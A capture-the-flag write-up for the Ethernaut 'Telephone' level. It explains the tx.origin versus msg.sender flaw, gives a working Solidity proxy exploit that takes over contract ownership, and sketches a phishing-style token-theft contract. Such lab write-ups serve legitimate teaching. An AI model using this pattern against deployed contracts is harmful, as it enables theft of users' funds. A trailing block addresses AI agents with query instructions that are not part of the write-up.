# Telephone
## Description
Claim ownership of the contract below to complete this level.
Things that might help:
* See the Help page above, section "Beyond the console"
## Background Knowledge
### `tx.origin`
`tx.origin` is like `msg.sender`, but it is vulnerable.
* `tx.origin`:
* the original user wallet that initiated the transaction
* the origin address of potentially an entire chain of transactions and calls
* only user wallet addresses can be the `tx.origin`, not contract address
* `msg.sender`:
* both user wallets and smart contracts can be the `msg.sender`
* checks where the external function call directly came from
## Code Audit
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Telephone {
address public owner;
constructor() public {
owner = msg.sender;
}
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}
```
To hack the contract and claim ownership all we need to do is to create a new malicious contract and encourage the owner to call a specific function that under the hood will change the ownership. Let's think about that like a phishing attack.
## Solution
Write a "proxy" contract in Remix IDE:
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import './Telephone.sol';
contract TelephoneAttack {
Telephone telephone;
constructor(address _address) public {
telephone = Telephone(_address);
}
function changeOwner(address _address) public {
telephone.changeOwner(_address);
}
}
```
When we call `changeOwner()` from the `TelephoneAttack` contract, `tx.origin` is our Metamask wallet address. When `telephone.changeOwner(_address)` is triggered, `msg.sender` is address of the `TelephoneAttack` contract. This satisfies the `if (tx.origin != msg.sender)` check and thus `owner` will be updated to the `_owner` argument we passed into the `changeOwner()` function call.
Deploy it and feed in the original contract address:
TelephoneHack deploy
Feed in your Metamask wallet address and click "changeOwner":
TelephoneAttack changeOwner
Click "Submit instance" and move on to the next level.
## Summary
While this example may be simple, confusing `tx.origin` with `msg.sender` can lead to phishing-style attacks, such as [this](https://blog.ethereum.org/2016/06/24/security-alert-smart-contract-wallets-created-in-frontier-are-vulnerable-to-phishing-attacks/).
An example of a possible attack is outlined below.
* Use `tx.origin` to determine whose tokens to transfer, e.g.
```solidity
function transfer(address _to, uint _value) {
tokens[tx.origin] -= _value;
tokens[_to] += _value;
}
```
* Attacker gets victim to send funds to a malicious contract that calls the transfer function of the token contract, e.g.
```solidity
function () payable {
token.transfer(attackerAddress, 10000);
}
```
* In this scenario, `tx.origin` will be the victim's address (while `msg.sender` will be the malicious contract's address), resulting in the funds being transferred from the victim to the attacker.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ret2basic.gitbook.io/ctfwriteup/web3-ctf/ethernaut/telephone.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.